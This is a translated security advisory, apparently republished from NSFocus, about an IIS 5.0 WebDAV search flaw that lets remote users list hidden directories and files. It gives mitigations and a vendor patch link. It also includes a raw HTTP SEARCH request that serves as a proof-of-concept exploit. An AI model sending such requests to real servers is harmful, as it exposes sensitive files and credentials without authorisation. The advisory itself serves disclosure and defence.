Vulnerability to leaking index directory in Microsoft IIS 5.0

Source: Internet
Author: User
Tags iis knowledge base microsoft iis
iis| Index | Microsoft Microsoft IIS 5.0 Leak Index Directory vulnerability

Release Date: 2000-10-6

Renew Date: 2000-10-6
Affected systems: Microsoft IIS 5.0
+ Microsoft Windows NT 2000


Describe:
--------------------------------------------------------------------------------


If the index server in IIS 5.0 is allowed, remote users may view the entire root structure and all subdirectories because there is a flaw in the lookup implementation of WebDAV. Hidden directories, included files (*.inc), or other documents that are generally inaccessible in the normal web interface will be compromised by this vulnerability.
Successfully exploiting this vulnerability could lead to specific files that might contain sensitive information such as user names and passwords.
The index server in IIS 5.0 is prohibited by default, and only directories with the index attribute set are affected by this vulnerability.

<* Source: David Litchfield <dlitchfield@atstake.com> *>



Test program:
--------------------------------------------------------------------------------

Warning

The following procedures (methods) may be offensive for security research and teaching purposes only. Users are at risk!


Send the following request to the server:
search/http/1.1
Host:target
Content-type:text/xml
content-length:133

<?xml version= "1.0"?>
<g:searchrequest xmlns:g= "DAV:" >
<g:sql>
Select "Dav:displayname" from Scope ()
</g:sql>
</g:searchrequest>



--------------------------------------------------------------------------------
Suggestions:
Interim solution:

NSFocus recommends that you use the solution offered by Microsoft:
If you are not using the index Server (for example, there is nothing in your Web site that you need to find), disable or uninstall the service. or disable the option "Index this resource" for directories that contain sensitive information.

Vendor Patch:

Microsoft has released a Knowledge Base article detailing the solution to this problem, which can be found in the following locations:
http://www.microsoft.com/technet/support/kb.asp?ID=272079


Sino-Union Green Alliance translation finishing, without permission, may not reprint
Welcome to visit our site http://www.nsfocus.com/
The Alliance of the Green Alliance to give you security protection



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.